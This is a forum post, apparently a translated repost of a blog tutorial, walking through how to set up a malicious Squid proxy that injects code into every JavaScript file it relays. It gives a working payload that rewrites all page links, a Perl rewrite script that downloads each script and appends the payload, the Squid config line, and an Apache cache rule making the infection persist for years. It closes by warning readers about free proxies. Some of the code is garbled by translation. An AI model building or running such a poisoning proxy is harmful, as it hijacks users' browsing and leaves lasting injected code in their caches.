This post was last edited by Mo Xiaowen on 2015-6-7 23:19
This can be done by simply modifying the configuration of SQUID
What is SQUID?
Squid is a software that caches Internet data, receives download requests from users, and automatically processes the downloaded data. When a user wants to download a homepage, he can send a request to Squid, ask Squid to download it on his behalf, then Squid connects to the website and requests the homepage, and then sends the homepage to the user while keeping a backup, when other users apply for the same page, Squid immediately sends the saved backup to the user, so that the user feels that the speed is quite fast. Squid can proxy protocols such as HTTP, FTP, GOPHER, SSL, and WAIS, and Squid can handle it automatically, and you can set up Squid according to your needs to filter out unwanted things.
Squid can work in many operating systems, such as AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2, etc.
The implementation is very simple:
1. Install Squid on one Linux server.
2. Modify the server's code, insert a piece of our code into all the transmitted javascrip and send it out.
3. Set the cache time of our modified js file as high as possible.
This method also applies to websites with SSL enabled, if the website loads an insecure resource (such as jquery for an HTTP site), most browsers will give a warning, but few people pay attention.
Chema said that more than 5,000 people used his proxy a few days after he released it, and most people used it to do bad things, because they used the proxy, so they thought it was anonymous and safe, but they never expected that the proxy server would do bad things too.
Make your malicious proxy server
If you already have a Squid proxy server, you will also need a web server such as Apache.
Step 1 Create a Payload
I use a simple script as a demonstration to point all the hyperlinks to my website.
/etc/squid/payload.js
[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Step 2 Write a script to infect all JS files
/etc/squid/poison.pl
[mw_shl_code=perl,true]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while(<>)
{
chomp $_;
if($_ =- /(.*.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
print "http://127.0.0.1:80/tmp/$pid-$count.js";
}
else
{
print "$_";
}
$count++;
}[/mw_shl_code]
This script uses wget to get the original javascrip of the page and remove the t file, then add the code in /etc/squid/payload.js and send the modified file to the client, while you need to create the /var/www/tmp directory and allow squid to write files in it. This directory stores the modified js files.
Step 3 Combine the above script with Squid
Add it in /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Step 4 Make the cache never fail
/var/www/tmp/.htaccess
[mw_shl_code=html,true] ExpiresActive On
ExpiresDefault "access plus 3000 days"[/mw_shl_code]
This will tell Apache to give him a long expiration time until the user cleans up their cache.
If you connect this proxy, clicking on any hyperlink will redirect you to my website, and the cache will still exist even if you don't use the proxy later. I just used a non-aggressive payload, and with this method, hackers can do a lot more. So, remind yourself and friends to be cautious about using free proxies.
|
Posted on 1/19/2015 2:34:56 AM
|
|
|
|
Posted on 1/19/2015 8:48:45 AM
|
Landlord|
Posted on 1/20/2015 2:36:06 PM
|
